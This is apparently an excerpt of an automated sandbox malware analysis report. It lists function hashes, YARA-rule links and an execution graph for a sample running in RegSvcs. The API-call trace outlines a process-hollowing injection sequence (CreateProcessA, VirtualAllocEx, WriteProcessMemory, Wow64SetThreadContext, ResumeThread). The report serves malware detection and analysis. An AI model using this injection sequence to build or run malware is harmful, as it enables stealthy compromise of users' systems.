                                                • Instruction ID: ab3e7563e7c36f85c567b294137aba1cf1c4f711ed6121224532f69e0e4671a0
                                                • Opcode Fuzzy Hash: 43a785bc979c9135cd4fe0b2d894aed6a39797de8a7dc882ec78ffdee4cb7e72
                                                • Instruction Fuzzy Hash: 4921E730B00605CFDB14FB68C5946AE77F6BB89245F1004A8D506FF291EB3A9D46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581380 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab2a9b80a1d73911a6ef2a15d62fc1609e4a878105fb12238b4d6aa26878df40
                                                • Instruction ID: 43238b1ab7a91a83c504563e954f5871281ca50284f9604238b3628b3fe92f20
                                                • Opcode Fuzzy Hash: ab2a9b80a1d73911a6ef2a15d62fc1609e4a878105fb12238b4d6aa26878df40
                                                • Instruction Fuzzy Hash: 0B21CA306007018FEB366E6CE4C972D3B69F746711F14082AE406EF2A2DE3D88868742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015816B0 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0163dcec5605c6f4c499f6bf7ddcb9100c956309704c1c1288414e8637854f54
                                                • Instruction ID: cc19d191534f74ea91ffa8be66868620130a8161dee776b5b7fd507f14a22f71
                                                • Opcode Fuzzy Hash: 0163dcec5605c6f4c499f6bf7ddcb9100c956309704c1c1288414e8637854f54
                                                • Instruction Fuzzy Hash: DD2142306106048FEF16FE68E884B5E376DFB45344F105A39E446DB256EB7CDC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581878 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cd591736318e796a4e426e65506708ea96f950222d6262fde5cd2c032185d04
                                                • Instruction ID: 57c704da43417c5cbafe5b1ee2b5846b7367ef91610ba41e560716742bcd0491
                                                • Opcode Fuzzy Hash: 4cd591736318e796a4e426e65506708ea96f950222d6262fde5cd2c032185d04
                                                • Instruction Fuzzy Hash: 5A210A30B40645CFDB14FB78C9946AE77B6BB89205F1005A9D105FF2A1DB3A8D42CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01584F98 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ecaaa4b9d43f928985f203dbfc9ddd59a5069eb98b8fef4883ecc3d9d30312d
                                                • Instruction ID: 02b24dd4d819b9c447294411e69b9b3585f69fc03976d0e497b246b4caa18f6f
                                                • Opcode Fuzzy Hash: 1ecaaa4b9d43f928985f203dbfc9ddd59a5069eb98b8fef4883ecc3d9d30312d
                                                • Instruction Fuzzy Hash: DF21F434710205CFDB14EF79D558AAE77F5FB89204B2004A8E506EF3A4EB7A9D05CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581390 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b9cac18e9d7d375f1fcc1d7b7e6971713ed07b928121e25f726f07e6ee15eab
                                                • Instruction ID: 674c8eb8d63bb5a9148be3f31fe528d62ec560992cd050f224f2e4791aeb99cf
                                                • Opcode Fuzzy Hash: 7b9cac18e9d7d375f1fcc1d7b7e6971713ed07b928121e25f726f07e6ee15eab
                                                • Instruction Fuzzy Hash: 041179706007158FEB367E6CE4C972D3A69F746754F140829E407EF6A1DE7988868742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01580838 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb71a6283eb3fe1595ece9246f3420eb94f835e88f33c4b5f9452ca7f648f174
                                                • Instruction ID: 0df23b99794015d6b8298aaf49f5ced8c4b787e85591c98d5086e65026c62daf
                                                • Opcode Fuzzy Hash: bb71a6283eb3fe1595ece9246f3420eb94f835e88f33c4b5f9452ca7f648f174
                                                • Instruction Fuzzy Hash: E1116631A153044BEF167A68841476E3655FB81254F144979F442FF1C2D668CCC94FD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01580848 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a93050e6faab8e21b11b9d6adeebb338ae69ad8a49156da27e213c365b8a2bc
                                                • Instruction ID: 05f7bc5a0c6415ff38771d2c0eee4f74c702e991d8fb572d8f486d66f7880c35
                                                • Opcode Fuzzy Hash: 9a93050e6faab8e21b11b9d6adeebb338ae69ad8a49156da27e213c365b8a2bc
                                                • Instruction Fuzzy Hash: 7E118230B212048BEF667A79C40472E3295FB85654F104939F406EF2C2EA78DDCA8FC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0153D006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394625491.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_153d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b23b223794c594d5e6912f78f9472eadffb5c7d9f8bb7b7a1d8fe28e6ec3547
                                                • Instruction ID: 2163cb37adcb59336ed5f26f26511be5e78c9cda1e54eef5f4f5529f93f9af3c
                                                • Opcode Fuzzy Hash: 5b23b223794c594d5e6912f78f9472eadffb5c7d9f8bb7b7a1d8fe28e6ec3547
                                                • Instruction Fuzzy Hash: 302180755093808FCB02CF64D990715FF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01580AFB Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2de9322f2925e5dacdfc1a782eab0e6c5dd8bb88e33231b3de44f468ee21e9cf
                                                • Instruction ID: 82c2746098e75d7de3de840453b4a661982980e0ec0be35c07bbbaecf45a752b
                                                • Opcode Fuzzy Hash: 2de9322f2925e5dacdfc1a782eab0e6c5dd8bb88e33231b3de44f468ee21e9cf
                                                • Instruction Fuzzy Hash: CF01042155D252C7FF23B56880A4238BB0C7B31264B64482AF2D4BB78BD724C15CD662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01586BB0 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff8615cb592c5e38645b361f43f170b3f746c2dedc52be40253eba47666dc4b4
                                                • Instruction ID: 039b3754319ed7f121dca0f6dc781926439bc668240caf66a28db52178a7cdd6
                                                • Opcode Fuzzy Hash: ff8615cb592c5e38645b361f43f170b3f746c2dedc52be40253eba47666dc4b4
                                                • Instruction Fuzzy Hash: 7E11C2327082516FD305AB38845465E7FB6FFCA700B1185EAD049CB392EA398846CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015817C0 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6075b5531238426e4932d804a2472b76f567d4849cfb32b10a72666975b15db
                                                • Instruction ID: 42a9d7f64b8f8f2f54333d422f8cd6f579d46f3d2eee4a432ae9966374420044
                                                • Opcode Fuzzy Hash: b6075b5531238426e4932d804a2472b76f567d4849cfb32b10a72666975b15db
                                                • Instruction Fuzzy Hash: 6611C276B407018FDB10AE78A98965E7BA9FB84764F14046DE505EB284EB3899038B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158148F Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f54c8bf7c9755ccc456a4cfe0999d3efafa65daf462a26e0ed0b293cd77c564
                                                • Instruction ID: 0899f16e31d41aed39427672ac5537f757f46277b85c06e2c60d025c61ce440e
                                                • Opcode Fuzzy Hash: 2f54c8bf7c9755ccc456a4cfe0999d3efafa65daf462a26e0ed0b293cd77c564
                                                • Instruction Fuzzy Hash: E5111E31A006159FDB11FFBC84901AE7BF5FB88210F154479D805FB341E736D9428BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015817D0 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b61461ca8bc802acd53a6bbcee823736416749ecc03318a5e5eab7ecbce5e5db
                                                • Instruction ID: 4eff0a21b1abf5548db1d44831707e2bb916b8ed3fc0c178b5438b0ff53b81c2
                                                • Opcode Fuzzy Hash: b61461ca8bc802acd53a6bbcee823736416749ecc03318a5e5eab7ecbce5e5db
                                                • Instruction Fuzzy Hash: DE018BB5B002159FCB10AEB9A84965F7FA9FB88660F100479E905E3344EA3899028B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01581498 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39685a7f5920f111f8b0654e1c529d0e8c61632f90720622c3ab65c312c904b8
                                                • Instruction ID: 3d6b2c110c753664d26b23d386ab83e76660392e96ba97191e4f913319db9131
                                                • Opcode Fuzzy Hash: 39685a7f5920f111f8b0654e1c529d0e8c61632f90720622c3ab65c312c904b8
                                                • Instruction Fuzzy Hash: 6D012D31A006169FDF22FFBC84901AE7BE5FB88220B15447AD805FB341E736C9428BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01586BA0 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc2013d2b1b4a38b8332b9237df0e4f34008c3655f28e2f12c2d737cb7f4a125
                                                • Instruction ID: 10081c100d24e54983c404f5bb95c5b8012b59d2baf26453e81b29c5b0d21814
                                                • Opcode Fuzzy Hash: dc2013d2b1b4a38b8332b9237df0e4f34008c3655f28e2f12c2d737cb7f4a125
                                                • Instruction Fuzzy Hash: 3701DF72B042559FD705ABB8945035D7BA6FFCA301F0044AEC00ADB391EE7988458BA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015840FF Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 325c125852eb6d3b2ea000ff87b0ff4f8a323be3c4ebeacea86e46d856067fa0
                                                • Instruction ID: 55d2728f36a6075b3ce1bac29df7b13e31a4ec34ef3e8d5825be7d1b2465136a
                                                • Opcode Fuzzy Hash: 325c125852eb6d3b2ea000ff87b0ff4f8a323be3c4ebeacea86e46d856067fa0
                                                • Instruction Fuzzy Hash: 1D11F330E0024ADFEF24FA98D9987ECBB72BF70319F14112AD811BA1909B7048C9CB15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0158099B Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79de61384ebc5586476b40c805b42ba4a264ade4b6a124670b4b6a96b1807187
                                                • Instruction ID: 3a91171290df9ca497788e0d6bc22150cf6f45e48086edf96991e01dabb83e64
                                                • Opcode Fuzzy Hash: 79de61384ebc5586476b40c805b42ba4a264ade4b6a124670b4b6a96b1807187
                                                • Instruction Fuzzy Hash: 08F04F20A2920996FF32756D885033C3658F751214F104835F689EF2C6DB28C999DB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015880F1 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c6b1cf06cb993084672dd79f05b4bf113a3f62bbcddacfcd381e7df6fc15462
                                                • Instruction ID: 4cd8eb9d2d94040ee3da7d1484a932fd09657974702f927bc70644b553673fea
                                                • Opcode Fuzzy Hash: 1c6b1cf06cb993084672dd79f05b4bf113a3f62bbcddacfcd381e7df6fc15462
                                                • Instruction Fuzzy Hash: 7F011A30910209AFEB45EFA4E850A9E7BBAFB44340F1056B9C845AB150EA79AE449B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015809CD Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfcf13bbe89ee71075da0b38650470cef3d955c34a47bec8bd3772242efcafa9
                                                • Instruction ID: 6b2bb1a70f11b3570a540c9cd9eb4cf105e66c41b19192edee83da48d919e220
                                                • Opcode Fuzzy Hash: cfcf13bbe89ee71075da0b38650470cef3d955c34a47bec8bd3772242efcafa9
                                                • Instruction Fuzzy Hash: 6EF02E1161E14147FF23716854A02787B58BF23274B90446AE1C8FF7D7E604C45DC751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01587090 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a4eda22b59a86ffc8d567b38e6ac02fb2e92a828828938ec640df52437635bf
                                                • Instruction ID: 288fb3db31a40f50f927b5c0ffaf6238e15fbfd9f652fe008cba6e3c8a2ef787
                                                • Opcode Fuzzy Hash: 0a4eda22b59a86ffc8d567b38e6ac02fb2e92a828828938ec640df52437635bf
                                                • Instruction Fuzzy Hash: B4F0C439B40118CFCB14DB68D5A8A6D7BB2FF88715F2541A9E5069B3A0DB35AD02CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01588100 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51e4e3b8031093ffa39b1aa99193ebe344ea0fcb61a9a8a38e7935a091d36aaf
                                                • Instruction ID: 700fbd383249436189b60c7490dfdd5e00fa1256c364dd55e5ef29dacf973b12
                                                • Opcode Fuzzy Hash: 51e4e3b8031093ffa39b1aa99193ebe344ea0fcb61a9a8a38e7935a091d36aaf
                                                • Instruction Fuzzy Hash: 66F03130910209EFDB45FFB4F850A9D77BAFB44340F1096B8C405AB250EB796F449B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:8.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:194
                                                Total number of Limit Nodes:3
                                                execution_graph 37191 5107f10 37192 5107f3f 37191->37192 37196 5107a4c 37192->37196 37194 51087f4 37195 5107f7f 37194->37195 37195->37194 37197 5107a57 37196->37197 37200 5107cbc 37197->37200 37199 510d6cf 37199->37195 37201 5107cc7 37200->37201 37202 510d702 37201->37202 37205 29d5cdc 37201->37205 37210 29d8248 37201->37210 37202->37199 37207 29d5ce7 37205->37207 37206 29d8549 37206->37202 37207->37206 37215 29dcca1 37207->37215 37220 29dccb0 37207->37220 37211 29d824b 37210->37211 37212 29d8549 37211->37212 37213 29dcca1 2 API calls 37211->37213 37214 29dccb0 2 API calls 37211->37214 37212->37202 37213->37212 37214->37212 37216 29dccd1 37215->37216 37217 29dccf5 37216->37217 37225 29dce4f 37216->37225 37229 29dce60 37216->37229 37217->37206 37221 29dccd1 37220->37221 37222 29dccf5 37221->37222 37223 29dce4f 2 API calls 37221->37223 37224 29dce60 2 API calls 37221->37224 37222->37206 37223->37222 37224->37222 37227 29dce6d 37225->37227 37226 29dcea7 37226->37217 37227->37226 37233 29db6c0 37227->37233 37230 29dce6d 37229->37230 37231 29db6c0 2 API calls 37230->37231 37232 29dcea7 37230->37232 37231->37232 37232->37217 37234 29db6cb 37233->37234 37236 29ddbb8 37234->37236 37237 29dcfc4 37234->37237 37236->37236 37238 29dcfcf 37237->37238 37239 29d5cdc 2 API calls 37238->37239 37240 29ddc27 37239->37240 37244 29df990 37240->37244 37249 29df9a8 37240->37249 37241 29ddc61 37241->37236 37245 29df9e5 37244->37245 37246 29df9d9 37244->37246 37245->37241 37246->37245 37254 51009c0 37246->37254 37259 51009b0 37246->37259 37250 29df9e5 37249->37250 37251 29df9d9 37249->37251 37250->37241 37251->37250 37252 51009b0 2 API calls 37251->37252 37253 51009c0 2 API calls 37251->37253 37252->37250 37253->37250 37255 51009eb 37254->37255 37256 5100a9a 37255->37256 37264 5101890 37255->37264 37269 51018a0 37255->37269 37260 51009eb 37259->37260 37261 5100a9a 37260->37261 37262 5101890 2 API calls 37260->37262 37263 51018a0 2 API calls 37260->37263 37262->37261 37263->37261 37265 51018a0 37264->37265 37267 51018f0 CreateWindowExW 37265->37267 37268 51018e5 CreateWindowExW 37265->37268 37266 51018d5 37266->37256 37267->37266 37268->37266 37271 51018f0 CreateWindowExW 37269->37271 37272 51018e5 CreateWindowExW 37269->37272 37270 51018d5 37270->37256 37271->37270 37272->37270 37335 714ef80 37336 714efc5 Wow64SetThreadContext 37335->37336 37338 714f00d 37336->37338 37395 714f7a0 37396 714f829 CreateProcessA 37395->37396 37398 714f9eb 37396->37398 37343 29dd378 37344 29dd3be 37343->37344 37348 29dd558 37344->37348 37351 29dd547 37344->37351 37345 29dd4ab 37356 29db6d0 37348->37356 37352 29dd552 37351->37352 37355 29dd50b 37351->37355 37353 29dd586 37352->37353 37354 29db6d0 DuplicateHandle 37352->37354 37353->37345 37354->37353 37355->37345 37357 29dd5c0 DuplicateHandle 37356->37357 37358 29dd586 37357->37358 37358->37345 37399 29d4668 37400 29d4672 37399->37400 37404 29d4759 37399->37404 37409 29d4218 37400->37409 37402 29d468d 37405 29d477d 37404->37405 37413 29d4868 37405->37413 37417 29d4859 37405->37417 37410 29d4223 37409->37410 37425 29d5c4c 37410->37425 37412 29d6f8d 37412->37402 37414 29d488f 37413->37414 37415 29d496c 37414->37415 37421 29d44e0 37414->37421 37418 29d4866 37417->37418 37419 29d44e0 CreateActCtxA 37418->37419 37420 29d496c 37418->37420 37419->37420 37422 29d58f8 CreateActCtxA 37421->37422 37424 29d59bb 37422->37424 37424->37424 37426 29d5c57 37425->37426 37429 29d5c7c 37426->37429 37428 29d7035 37428->37412 37430 29d5c87 37429->37430 37433 29d5cac 37430->37433 37432 29d711a 37432->37428 37434 29d5cb7 37433->37434 37435 29d5cdc 2 API calls 37434->37435 37436 29d720d 37435->37436 37436->37432 37273 115d01c 37274 115d034 37273->37274 37275 115d08e 37274->37275 37280 5101a97 37274->37280 37285 5101aa8 37274->37285 37290 5102808 37274->37290 37295 5102818 37274->37295 37281 5101ace 37280->37281 37283 5102818 2 API calls 37281->37283 37284 5102808 2 API calls 37281->37284 37282 5101aef 37282->37275 37283->37282 37284->37282 37286 5101ace 37285->37286 37288 5102818 2 API calls 37286->37288 37289 5102808 2 API calls 37286->37289 37287 5101aef 37287->37275 37288->37287 37289->37287 37291 5102845 37290->37291 37292 5102877 37291->37292 37300 5102d85 37291->37300 37304 5102da8 37291->37304 37296 5102845 37295->37296 37297 5102877 37296->37297 37298 5102d85 2 API calls 37296->37298 37299 5102da8 2 API calls 37296->37299 37298->37297 37299->37297 37302 5102d88 37300->37302 37301 5102e48 37301->37292 37308 5102e60 37302->37308 37306 5102dbc 37304->37306 37305 5102e48 37305->37292 37307 5102e60 2 API calls 37306->37307 37307->37305 37309 5102e71 37308->37309 37311 510402b 37308->37311 37309->37301 37315 5104050 37311->37315 37319 5104040 37311->37319 37312 510403a 37312->37309 37316 5104092 37315->37316 37318 5104099 37315->37318 37317 51040ea CallWindowProcW 37316->37317 37316->37318 37317->37318 37318->37312 37320 5104050 37319->37320 37321 51040ea CallWindowProcW 37320->37321 37322 5104099 37320->37322 37321->37322 37322->37312 37359 510d6bb 37360 510d6c0 37359->37360 37361 5107cbc 2 API calls 37360->37361 37362 510d6cf 37361->37362 37323 714f118 37324 714f160 WriteProcessMemory 37323->37324 37326 714f1b7 37324->37326 37327 714f058 37328 714f098 VirtualAllocEx 37327->37328 37330 714f0d5 37328->37330 37331 714ea98 37332 714ead8 ResumeThread 37331->37332 37334 714eb09 37332->37334 37339 714f208 37340 714f253 ReadProcessMemory 37339->37340 37342 714f297 37340->37342 37363 29dabf0 37364 29dabff 37363->37364 37367 29dacd9 37363->37367 37375 29dace8 37363->37375 37368 29dacf9 37367->37368 37369 29dad1c 37367->37369 37368->37369 37383 29daf71 37368->37383 37387 29daf80 37368->37387 37369->37364 37370 29dad14 37370->37369 37371 29daf20 GetModuleHandleW 37370->37371 37372 29daf4d 37371->37372 37372->37364 37376 29dacf9 37375->37376 37377 29dad1c 37375->37377 37376->37377 37381 29daf71 LoadLibraryExW 37376->37381 37382 29daf80 LoadLibraryExW 37376->37382 37377->37364 37378 29dad14 37378->37377 37379 29daf20 GetModuleHandleW 37378->37379 37380 29daf4d 37379->37380 37380->37364 37381->37378 37382->37378 37384 29daf94 37383->37384 37386 29dafb9 37384->37386 37391 29da0a8 37384->37391 37386->37370 37388 29daf94 37387->37388 37389 29dafb9 37388->37389 37390 29da0a8 LoadLibraryExW 37388->37390 37389->37370 37390->37389 37392 29db160 LoadLibraryExW 37391->37392 37394 29db1d9 37392->37394 37394->37386

                                                Executed Functions

                                                Function 0714F794 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2496 714f794-714f835 2499 714f837-714f841 2496->2499 2500 714f86e-714f88e 2496->2500 2499->2500 2501 714f843-714f845 2499->2501 2507 714f8c7-714f8f6 2500->2507 2508 714f890-714f89a 2500->2508 2503 714f847-714f851 2501->2503 2504 714f868-714f86b 2501->2504 2505 714f855-714f864 2503->2505 2506 714f853 2503->2506 2504->2500 2505->2505 2509 714f866 2505->2509 2506->2505 2514 714f92f-714f9e9 CreateProcessA 2507->2514 2515 714f8f8-714f902 2507->2515 2508->2507 2510 714f89c-714f89e 2508->2510 2509->2504 2512 714f8a0-714f8aa 2510->2512 2513 714f8c1-714f8c4 2510->2513 2516 714f8ac 2512->2516 2517 714f8ae-714f8bd 2512->2517 2513->2507 2528 714f9f2-714fa78 2514->2528 2529 714f9eb-714f9f1 2514->2529 2515->2514 2518 714f904-714f906 2515->2518 2516->2517 2517->2517 2519 714f8bf 2517->2519 2520 714f908-714f912 2518->2520 2521 714f929-714f92c 2518->2521 2519->2513 2523 714f914 2520->2523 2524 714f916-714f925 2520->2524 2521->2514 2523->2524 2524->2524 2525 714f927 2524->2525 2525->2521 2539 714fa88-714fa8c 2528->2539 2540 714fa7a-714fa7e 2528->2540 2529->2528 2542 714fa9c-714faa0 2539->2542 2543 714fa8e-714fa92 2539->2543 2540->2539 2541 714fa80 2540->2541 2541->2539 2545 714fab0-714fab4 2542->2545 2546 714faa2-714faa6 2542->2546 2543->2542 2544 714fa94 2543->2544 2544->2542 2548 714fac6-714facd 2545->2548 2549 714fab6-714fabc 2545->2549 2546->2545 2547 714faa8-714faab 2546->2547 2547->2545 2550 714fae4 2548->2550 2551 714facf-714fade 2548->2551 2549->2548 2554 714fae5 2550->2554 2551->2550 2554->2554
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0714F9D6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: cdd51c0839c76eada510a99168c56b34c3459418b85ca9d1be1e27edfa67d3fc
